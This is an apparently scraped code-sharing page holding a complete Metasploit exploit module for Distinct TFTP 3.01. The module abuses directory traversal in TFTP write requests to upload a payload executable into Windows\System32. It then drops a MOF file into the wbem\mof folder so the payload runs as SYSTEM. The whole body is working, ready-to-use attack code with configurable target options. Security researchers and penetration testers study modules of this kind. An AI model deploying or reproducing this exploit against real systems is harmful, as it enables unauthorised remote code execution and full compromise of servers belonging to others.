扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info={}) super(update_info(info, 'Name' => "Distinct TFTP 3.01 Writable Directory Traversal Execution", 'Description'=> %q{ This module exploits a vulnerability found in Distinct TFTP server.The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context of 'SYSTEM'. }, 'License'=> MSF_LICENSE, 'Author' => [ 'modpr0be',#Initial discovery, PoC (Tom Gregory) 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '80984'], ['EDB', '18718'], ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'] ], 'Payload'=> { 'BadChars' => "\x00", }, 'DefaultOptions'=> { 'ExitFunction' => "none" }, 'Platform' => 'win', 'Targets'=> [ ['Distinct TFTP 3.01 on Windows', {}] ], 'Privileged' => false, 'DisclosureDate' => "Apr 8 2012", 'DefaultTarget'=> 0)) register_options([ OptInt.new('DEPTH', [false, "Levels to reach base directory",10]), OptAddress.new('RHOST', [true, "The remote TFTP server address"]), OptPort.new('RPORT', [true, "The remote TFTP server port", 69]) ], self.class) end def upload(filename, data) tftp_client = Rex::Proto::TFTP::Client.new( "LocalHost"=> "0.0.0.0", "LocalPort"=> 1025 + rand(0xffff-1025), "PeerHost" => datastore['RHOST'], "PeerPort" => datastore['RPORT'], "LocalFile"=> "DATA:#{data}", "RemoteFile" => filename, "Mode" => "octet", "Context"=> {'Msf' => self.framework, "MsfExploit" => self }, "Action" => :upload ) ret = tftp_client.send_write_request { |msg| print_status(msg) } while not tftp_client.complete select(nil, nil, nil, 1) tftp_client.stop end end def exploit peer = "#{datastore['RHOST']}:#{datastore['RPORT']}" # Setup the necessary files to do the wbemexec trick exe_name = rand_text_alpha(rand(10)+5) + '.exe' exe= generate_payload_exe mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof= generate_mof(mof_name, exe_name) # Configure how deep we want to traverse depth= (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] levels = "../" * depth # Upload the malicious executable to C:\Windows\System32\ print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)") upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe) # Let the TFTP server idle a bit before sending another file select(nil, nil, nil, 1) # Upload the mof file print_status("#{peer} - Uploading .mof...") upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) end end |
体验盒子
